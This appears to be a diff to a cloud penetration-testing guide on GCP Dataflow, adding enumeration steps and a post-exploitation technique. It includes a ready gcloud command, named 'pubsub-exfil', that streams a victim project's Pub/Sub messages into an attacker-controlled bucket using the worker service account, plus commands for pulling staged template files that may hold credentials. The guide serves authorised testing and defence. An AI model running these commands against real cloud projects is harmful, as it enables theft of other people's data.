File: src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md (6 additions, 0 deletions)
@@ -46,4 +46,10 @@ Dataflow templates exist to export BigQuery data. Use the appropriate template f
+ Streaming pipelines can read from Pub/Sub (or other sources) and write to GCS. Launch a job with a template that reads from the target Pub/Sub subscription and writes to your controlled bucket.
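As a sketch of this technique, the Google-provided `Cloud_PubSub_to_GCS_Text` template (which reads from a topic; a subscription-based Flex variant also exists) can be launched to stream messages into a bucket you control. The project, topic, bucket, region, and job name below are placeholders, not values from the source:

```shell
# Sketch only: launch Google's Pub/Sub-to-GCS text template so messages
# land in an attacker-controlled bucket. All <angle-bracket> values and
# the region are placeholders/assumptions.
gcloud dataflow jobs run pubsub-exfil \
    --gcs-location gs://dataflow-templates/latest/Cloud_PubSub_to_GCS_Text \
    --region us-central1 \
    --parameters \
inputTopic=projects/<victim-project>/topics/<topic>,\
outputDirectory=gs://<attacker-bucket>/exfil/,\
outputFilenamePrefix=msgs-
```

The job runs with the project's Dataflow worker service account, so it succeeds as long as that account can read the source and you have permission to launch jobs; no direct Pub/Sub permission on your own identity is needed.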
File: src/pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md (7 additions, 1 deletion)
@@ -12,7 +12,7 @@ A Dataflow pipeline typically includes:
**Template:** YAML or JSON definitions (and Python/Java code for flex templates) stored in GCS that define the pipeline structure and steps.
- **Launcher:** A short-lived Compute Engine instance that validates the template and prepares containers before the job runs.
+ **Launcher (Flex Templates):** A short-lived Compute Engine instance may be used for Flex Template launches to validate the template and prepare containers before the job runs.
**Workers:** Compute Engine VMs that execute the actual data processing tasks, pulling UDFs and instructions from the template.
@@ -76,4 +76,10 @@ gcloud storage ls gs://<bucket>/**
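The bucket listing above fits into a broader enumeration flow: list jobs, describe one to find its staging/template bucket, then inspect the staged files. A hedged sketch, with region, job ID, bucket, and file names as placeholder assumptions:

```shell
# Sketch: enumerate Dataflow jobs and pull staged template/UDF files.
# Region, <job-id>, <bucket>, and file paths are placeholders.
gcloud dataflow jobs list --region us-central1 --status all
gcloud dataflow jobs describe <job-id> --region us-central1 --full
# Staging buckets often hold template definitions and user code:
gcloud storage ls "gs://<bucket>/**"
gcloud storage cat gs://<bucket>/templates/<template>.json
```

Template JSON and staged code frequently reveal pipeline sources, sinks, and sometimes credentials or connection strings worth collecting.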